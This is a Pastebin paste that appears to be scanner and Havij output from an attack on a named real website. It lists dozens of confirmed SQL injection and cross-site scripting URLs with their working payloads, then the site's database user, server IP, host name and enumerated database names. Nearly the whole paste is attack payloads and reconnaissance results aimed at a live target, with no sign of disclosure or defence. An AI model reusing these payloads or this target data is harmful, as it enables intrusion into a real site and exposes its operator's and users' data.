Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Boolean Based SQL Injection - BB.A.R.A.K.CZ
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/news.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=1&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10&id=10115
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/concerts.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid=102&cid=-1 OR 17-7=10&rid=10210&rreq=viewAll
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid=35&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/magazine.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=-1 OR 17-7=10&from=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/photoreports.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/liveshows.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/bazaar.php?cid=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/links.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/press_news.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/inc/save_as_txt.php?tid=101&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/print.php?tid=101&cid=0&rid=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/inc/send_as_email.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/author.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/readers_echos.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cid
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/picture_photo.php?iid=-1 OR 17-7=10&pid=1469
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: iid
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| XSS
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid=" stYle="x:expre/**/ssion(alert(9)) &id=10115
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid='"--></style></script><script>alert(0x000007)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000007)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/articles.php?cid="><ext/style=ext:expr/**/ession(alert(9))>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: "><ext/style=ext:expr/**/ession(alert(9))>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x0001BE)</script>&cid=13&rid=10210&rreq=viewAll
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tid
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0001BE)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid="></style><script>alert(9)</script>&cid=13&rid=10210&rreq=viewAll
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tid
- Parameter Type: Querystring
- Attack Pattern: "></style><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?cid="><script>alert(9)</script>&from=10
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/liveshows.php?from='"--></style></script><script>alert(0x0006A2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0006A2)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_small_91.php/"ns="alert(0x00058A)
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /"ns="alert(0x00058A)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/search.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: string
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000582)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/search.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: string
- Parameter Type: Post
- Attack Pattern: </a style=x:expre/**/ssion(alert(9))>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/photoreports.php?from='"--></style></script><script>alert(0x000624)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000624)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/photoreports.php?from=0'"--></style></script><script>alert(0x00077C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: 0'"--></style></script><script>alert(0x00077C)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/news.php?from='"--></style></script><script>alert(0x000653)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000653)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/news.php?from=0'"--></style></script><script>alert(0x00077B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: 0'"--></style></script><script>alert(0x00077B)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?from='"--></style></script><script>alert(0x000673)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000673)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?from=0'"--></style></script><script>alert(0x00077A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: 0'"--></style></script><script>alert(0x00077A)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from='"--></style></script><script>alert(0x0006A3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0006A3)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from="></script><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: "></script><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x0006BE)</script>&from=10
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0006BE)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x00077E)</script>&from=10
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cid
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00077E)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_banner_91.php/"ns="alert(0x0006FE)
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /"ns="alert(0x0006FE)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/press_news.php?from="><body onload=alert(9)>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: from
- Parameter Type: Querystring
- Attack Pattern: "><body onload=alert(9)>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x000816)</script>&cid=0&rid=3940&req=addForm
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tid
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000816)</script>
- ||| Havij |||
- Target: http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
- Keyword Found: autor
- Injection type is Integer
- Web Server: Apache
- DB Server: MySQL
- ||| Info |||
- Current User: bbarak.cz@93.185.104.22
- Current DB: bbarak_cz
- System User: bbarak.cz@93.185.104.22
- Host Name: www4
- Installation dir: /usr/local/
- Db user: 'bbarak.cz'@'%'
- Data Base Found: information_schema
- Data Base Found: ads_bbarak_cz
- Data Base Found: bbarak_cz
- Data Base Found: bugs_bbarak_cz
- Data Base Found: charta_bbarak_cz
- Data Base Found: chat_bbarak_cz
- Data Base Found: click_bbarak_cz
- Data Base Found: colas_bbarak_cz
- Data Base Found: counter_bbarak_cz
- Data Base Found: etickets_bbarak_cz
- Data Base Found: ilbau_bbarak_cz
- Data Base Found: records_bbarak_cz
- Data Base Found: shop_bbarak_cz
- Data Base Found: tasks_bbarak_cz
- Data Base Found: tiskovky_bbarak_cz
- Data Base Found: urbanrapublic_bbarak_cz
- |||
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement